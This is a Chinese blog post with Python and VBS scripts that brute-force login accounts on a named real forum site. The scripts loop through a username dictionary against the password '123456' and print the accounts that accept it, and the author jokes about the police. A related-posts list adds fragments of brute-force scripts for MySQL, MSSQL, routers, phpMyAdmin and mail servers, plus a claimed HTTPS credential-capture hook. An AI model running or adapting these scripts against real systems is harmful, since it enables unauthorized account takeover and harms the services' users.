Python牛刀小试密码爆破

难道真的要我破解一个么?算了,正好试试我的Python水平。
python版


代码如下:

#coding: gbk
import httplib, urllib

def Check(username, password):
params = urllib.urlencode(
{'userid': username, 'passwd': password})
headers = {"Content-type":
"application/x-www-form-urlencoded"}
conn = httplib.HTTPSConnection("www.bdwm.net")
conn.request("POST",
"/bbs/bbslog2.php", params, headers)
res = conn.getresponse().read()
conn.close()
if res.find("密码不正确") != -1:
return False
elif res.find("不存在这个用户") != -1:
return False
else:
return True

for i in open("English.Dic"):
if Check(i.rstrip(),"123456"):
print i

顺便也写了个VBS版的,感觉貌似VBS比较快,感觉出问题了?


代码如下:

Dim fso
Set fso = CreateObject("scripting.filesystemobject")
With fso.OpenTextFile("English.Dic",1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,"123456") Then
WScript.Echo id & vbTab &"OK"
End If
Loop
End With

Function Check(username,password)
Dim http
Set http = CreateObject("Msxml2.XMLHTTP")
http.open _
"POST","https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
"Content-Type","application/x-www-form-urlencoded"
http.send "userid=" & username & "&passwd=" & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,"密码不正确") Then
Check = False
ElseIf InStr(response,"不存在这个用户") Then
Check = False
Else
Check = True
End If
End Function

Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject("adodb.stream")
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = "gb2312"
AnsiToUnicode = ado.ReadText
End Function

事实证明,123456真是一个无敌的密码。但愿晚上没有警察叔叔敲门。
原文:http://demon.tw/programming/python-a-little-trial.html

(0)

相关推荐

  • Python版Mysql爆破小脚本

    Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典.用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 ) import MySQLdb #coding=gbk #目标IP mysql数据库必须开启3360远程登陆端口 mysql_usern

  • Python版Mssql爆破小脚本

    Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解 import pymssql common_weak_password = ('','123456','test','root','admin','user')#密码字典 mssql_us

  • python实现多线程暴力破解登陆路由器功能代码分享

    运行时请在其目录下添加user.txt passwd.txt两文件.否则会报错.程序没有加异常处理.代码比较挫..... 复制代码 代码如下: #coding:utf-8- import base64 import urllib2 import Queue import threading,re,sys queue = Queue.Queue() class Rout_thread(threading.Thread): def __init__(self,queue,passwd): threa

  • Python脚本暴力破解栅栏密码

    今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本. 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input('请输入要解密的字符串\n') elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result =

  • python制作企业邮箱的爆破脚本

    按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破的脚本. 我先说下整体思路: 总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果.POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息. 1.首先验证参数是否正确 Sys.argv[]是用来获取命令行参数的,sys.argv[0]表示代码本身文件路径,所以参数从1开始 2.然后从用户密码文件中读取信息 3.pop.getwel

  • python利用hook技术破解https的实例代码

    相对于http协议,http是的特点就是他的安全性,http协议的通信内容用普通的嗅探器可以捕捉到,但是https协议的内容嗅探到的是加密后的内容,对我们的利用价值不是很高,所以一些大的网站----涉及到"大米"的网站,采用的都是http是协议,嘿嘿,即便这样,还是有办法能看到他的用户名和密码的,嘿嘿,本文只是用于技术学习,只是和大家交流技术,希望不要用于做违法的事情,这个例子是在firefox浏览器下登录https协议的网站,我们预先打开程序,就来了个捕获用户名和密码: 下面是源代码

  • Python压缩解压缩zip文件及破解zip文件密码的方法

    python 的 zipfile 提供了非常便捷的方法来压缩和解压 zip 文件. 例如,在py脚本所在目录中,有如下文件: readability/readability.js readability/readability.txt readability/readability-print.css readability/sprite-readability.png readability/readability.css 将 readability 目录中的文件压缩到脚本所在目录的 read

  • Python写的PHPMyAdmin暴力破解工具代码

    PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用. #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTT

  • Python牛刀小试密码爆破

    难道真的要我破解一个么?算了,正好试试我的Python水平. python版 复制代码 代码如下: #coding: gbk import httplib, urllib def Check(username, password): params = urllib.urlencode( {'userid': username, 'passwd': password}) headers = {"Content-type": "application/x-www-form-url

  • python 换位密码算法的实例详解

     python 换位密码算法的实例详解 一前言: 换位密码基本原理:先把明文按照固定长度进行分组,然后对每一组的字符进行换位操作,从而实现加密.例如,字符串"Error should never pass silently",使用秘钥1432进行加密时,首先将字符串分成若干长度为4的分组,然后对每个分组的字符进行换位,第1个和第3个字符位置不变,把第2个字符和第4个字符交换位置,得到"Eorrrs shluoden v repssa liseltny" 二 代码:

  • Python生成密码库功能示例

    本文实例讲述了Python生成密码库功能.分享给大家供大家参考,具体如下: 这个代码是将字符的所有组合添加到一个文件中,可以设置密码的最大长度,我这里设置的是8位,但是要有心里准备,生成的文件特别大... lshuai<---~---> bc bc 1.06.95 Copyright 1991-1994, 1997, 1998, 2000, 2004, 2006 Free Software Foundation, Inc. This is free software with ABSOLUTE

  • python生成密码字典的方法

    这里我使用的是python27 主要用的是我之前博文里提到的itertools循环迭代的模块,用这个模块可以省不少事 首先要调用itertools import itertools as its 然后将字典需要的元素(或者说是关键字)赋给word变量 我们这里假设密码是纯数字,所以元素就是1234567890 即代码 words = "1234568790" 假设密码是4位,那么需要元素在迭代器中循环4次,即 r =its.product(words,repeat=4) 接着我们创建一

  • Python实现密码薄文件读写操作

    制作一个"密码薄",其可以存储一个网址,和一个密码(如 123456),请编写程序完成这个"密码薄"的增删改查功能,并且实现文件存储功能 D:\pytest_day\mimab\wenjian.py class WenJian(): def __init__(self,lujing,xieru): self.lujing=lujing self.xieru=xieru #读文件 def read_file(self): #打开文件 with open(self.lu

  • python实现密码强度校验

    本文实例为大家分享了python实现密码强度校验的具体代码,供大家参考,具体内容如下 一 校验规则 规则1 密码长度8位以上 规则2 密码需包含数字 规则3 密码需包含大小写字母 规则4 密码需包含特殊字符['+', '-', '*', '/', '_', '&', '%', ','] 规则5 校验5次不通过则强制退出 二 文件操作 每次输入的密码都会保存到文本文件中 以下是python的代码实现: """ 作者:zhengzhihui 版本:7.0 日期:2019/

  • python实现密码验证合格程序的思路详解

    题目描述 输入一行或多行字符串密码,验证每行密码是否符合规范,符合提示"OK",否则"NG".密码规范为: 1.长度超过8位 2.包括大小写字母.数字.其它符号,以上四种至少三种 3.不能有相同长度超2的子串重复 解题思路 1.获取输入的多行字符串 2.对每行字符串进行密码验证: 1)如果密码长度小于等于8或者是密码中有长度超过2的重复子串,则密码NG 2)在1)不满足的情况下再看有没有至少包含大写字母.小写字母.数字.其他符号 python代码实现 import

  • Python设计密码强度校验程序

    程序介绍 本程序利用 1.密码必须由数字.字母及特殊字符三种组合 2.密码只能由字母开头 3.密码长度不能低于16位 来判断密码程度. 首先,把可输入的字符写进去: symbols = r'''`!@#$%^&*()_+-=/*{}[]\|;:?/<>''' chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' nums = '0123456789' 然后开始循环并判断密码长度: while 1: print('-

  • Python移位密码、仿射变换解密实例代码

    前言 这个代码是很久之前的,已经忘记具体的思路了,你可以结合此文章来了解两个加密方式的内容. 前两个步骤是对应加密方式的函数,第三个步骤是整合. 一.移位密码 def yiwei(string,number): ''' 将字符串的每个字母,向右移动指定的位数,并返回移动后的字符串 如:A 向右移动3位,返回值为D string为字符串,number为整型 A的ASCII码为65 ''' new_string = "" string = string.upper() #转换为大写 for

  • python生成密码字典详解

    代码和代码运行的结果: 代码: import itertools as its words="rot123" a=its.product(words,repeat=4) name=open("pass.txt","a") for i in a: name.write("".join(i)) name.write("".join("\n")) name.close() 代码解析: #导入模

随机推荐